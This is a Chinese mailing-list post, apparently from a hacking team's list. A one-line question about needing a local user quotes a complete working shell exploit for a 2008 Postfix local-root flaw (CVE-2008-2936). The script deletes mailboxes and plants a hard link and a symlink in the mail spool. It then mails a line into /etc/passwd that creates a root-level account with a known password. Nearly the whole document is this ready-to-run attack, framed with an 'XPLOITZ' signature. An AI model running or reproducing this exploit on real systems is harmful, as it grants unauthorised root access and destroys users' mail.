要系统本地用户?

2008/9/1 大风 <[EMAIL PROTECTED]>

>
>
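#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <[EMAIL PROTECTED]>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
# NOTE: lines 2-9 above are printed as the banner by step 1; keep them there.
#
# Preconditions (each one is checked in step 1): an unprivileged local shell
# account, a mail spool directory writable by that account, $useful_link on
# the same filesystem as the spool, and a kernel that lets a hard link be made
# to a symlink without dereferencing it.
# WARNING: step 1 deletes the mailboxes $spool_dir/$user and
# $spool_dir/$useful_link_dst if they exist, and step 2 appends a line to
# $target.  Run it only on a system you own or are authorised to test.

# Config

writable_dir=/tmp                # Scratch and backup location; must be writable by us
spool_dir=/var/mail              # Use "postconf mail_spool_directory" to obtain this
user=root                        # Recipient whose mailbox becomes the planted link
target=/etc/passwd               # File the mail body gets appended to
useful_link=/usr/bin/atq         # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at               # Relative target of $useful_link; Postfix resolves it inside $spool_dir
                                 # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3                        # Time allowed for local delivery before checking $target
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh"   # Pass is "dsrrocks"
postfix=$(command -v postfix)    # /usr/sbin/postfix; empty when Postfix is not installed
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap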
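# Funcs

# Print a failure message on stderr and terminate the script.
# $1 - message to print
# $2 - exit status, default 1.  Every caller reports an abort condition, and
#      the original "exit" (status 0) made a failed precondition check look
#      like a clean run to whatever invoked the script.
quit()
{
  printf '%s\n' "$1" >&2
  exit "${2:-1}"
}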
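# Step 1: is my system vulnerable?

head -n 9 "$0" | tail -n 8        # print the banner (lines 2-9 of this file)

if [ -n "$postfix" ] ; then
  echo "[*] Postfix seems to be installed"
else
  quit "[!] Are you sure Postfix is installed?"
fi

# Probe the kernel: can a hard link be made to a symlink without the link
# being dereferenced?  That is the primitive the exploit relies on.  The
# scratch directory gets an unpredictable name so another local user cannot
# pre-plant something under the old fixed path $writable_dir/pocfix.
probe_dir=$(mktemp -d "$writable_dir/pocfix.XXXXXX") || quit "[!] Couldn't create scratch dir in $writable_dir"
touch "$probe_dir/src"
ln -s "$probe_dir/src" "$probe_dir/dst1"
ln "$probe_dir/dst1" "$probe_dir/dst2"

if [ -L "$probe_dir/dst2" ] ; then
  echo "[*] Hardlink to symlink not dereferenced"
  rm -rf -- "${probe_dir:?}"
else
  rm -rf -- "${probe_dir:?}"
  quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi

if [ -d "$spool_dir" ] && [ -w "$spool_dir" ] ; then
  echo "[*] Spool dir is writable"
else
  quit "[!] Spool dir is not writable"
fi

# Delete an existing mailbox file so the planted link can take its name.
# Destructive: mail waiting in it is lost and is never restored.
# A dangling symlink (left behind by an interrupted earlier run) fails the
# -e test, so -L is checked as well.
# $1 - mailbox name inside $spool_dir
remove_mailbox()
{
  if [ -e "$spool_dir/$1" ] || [ -L "$spool_dir/$1" ] ; then
    echo "[*] Mailbox for \"$1\" found. Trying to delete it"
    rm -f -- "$spool_dir/$1"
    if [ -e "$spool_dir/$1" ] || [ -L "$spool_dir/$1" ] ; then
      quit "[!] Couldn't delete it"
    else
      echo "[*] Deletion ok"
    fi
  fi
}

remove_mailbox "$user"
remove_mailbox "$useful_link_dst"

# Delivery must end up in the spool file: bail out if an alias for $user
# exists in a database that is actually consulted (alias_database listed in
# alias_maps).  "postconf name" prints "name = value"; strip the prefix.
aliases=$("$postconf" alias_database | sed 's/^[^=]*=[[:space:]]*//')
if [ -n "$aliases" ] && "$postconf" alias_maps | grep -F -q -- "$aliases" ; then
  # $aliases may name several maps; word-splitting is intended here.
  # shellcheck disable=SC2086
  if "$postmap" -q "$user" $aliases > /dev/null ; then
    quit "[!] Mail alias for \"$user\" exists"
  fi
fi

# A mailbox_command (procmail, maildrop, ...) would bypass Postfix's own
# spool-file delivery, which is the code path being exploited.
lda=$("$postconf" mailbox_command | sed 's/^[^=]*=[[:space:]]*//')
if [ -n "$lda" ] ; then
  quit "[!] Non-Postfix LDA detected"
fi

# A home_mailbox ending in "/" means Maildir delivery into $HOME, not a
# single spool file.
if "$postconf" home_mailbox | grep -q '/$' ; then
  quit "[!] Maildir-style mailbox detected"
fi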
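# Step 2: Exploiting
#
# $spool_dir/$user becomes a hard link to $useful_link, i.e. another name for
# a symlink whose relative target is "$useful_link_dst".  Resolved inside
# $spool_dir that is $spool_dir/$useful_link_dst, which we point at $target.
# When Postfix delivers the message to $user it opens that path and appends
# the message body -- the passwd line -- to $target.  Only $target is backed
# up; the mailbox step 1 deleted is not restored.

# Remove the planted links on every exit path (normal end or "quit").
# The :? guards abort instead of turning an unset variable into "rm /".
cleanup()
{
  rm -f -- "${spool_dir:?}/${user:?}"
  rm -f -- "${spool_dir:?}/${useful_link_dst:?}"
}

# Back up $target before planting anything, under an unpredictable name
# (the old fixed "$writable_dir/pocfix_target_backup.$$" could be pre-created
# by another local user).  A failed backup aborts here; previously it was
# ignored and the later diff then reported a bogus "successful".
backup=$(mktemp "$writable_dir/pocfix_target_backup.XXXXXX") || quit "[!] Couldn't create backup file in $writable_dir"
cp -f -- "$target" "$backup" || quit "[!] Couldn't back up $target"
echo "[*] Backed up: $target (saved as \"$backup\")"

trap cleanup EXIT

ln -f -- "$useful_link" "$spool_dir/$user" 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
ln -s -f -- "$target" "$spool_dir/$useful_link_dst" 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"

echo "[*] Sending mail ($seconds seconds wait)"
printf '%s\n' "$user_in_passwd" | /usr/sbin/sendmail "$user"

sleep "$seconds"

# diff exits 0 when identical, 1 when different and >1 on error.  Only 1 is
# a success; treating every non-zero status as success hid comparison errors.
diff -q -- "$target" "$backup" > /dev/null
case $? in
  0) echo "[!] Exploit failed" ;;
  1) echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")" ;;
  *) quit "[!] Couldn't compare $target with $backup" ;;
esac

# milw0rm.com [2008-08-31]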
>
>
>
>
>
>
>
> *[Ph4nt0m] <http://www.ph4nt0m.org/> *
>
> *[Ph4nt0m Security Team]*
>
>                *   [EMAIL PROTECTED] <http://blog.ph4nt0m.org/>*
>
> *          Email:  [EMAIL PROTECTED]
>
> *          PingMe:
> <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wuhq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
> *
>
> *          **=== V3ry G00d, V3ry Str0ng ===*
>
> *          === Ultim4te H4cking ===*
>
> *          === XPLOITZ ! ===*
>
> *          === #_# ===*
>
> *#If you brave,there is nothing you cannot achieve.#*
>
>
>
>
>
> >
>


-- 
I am aking
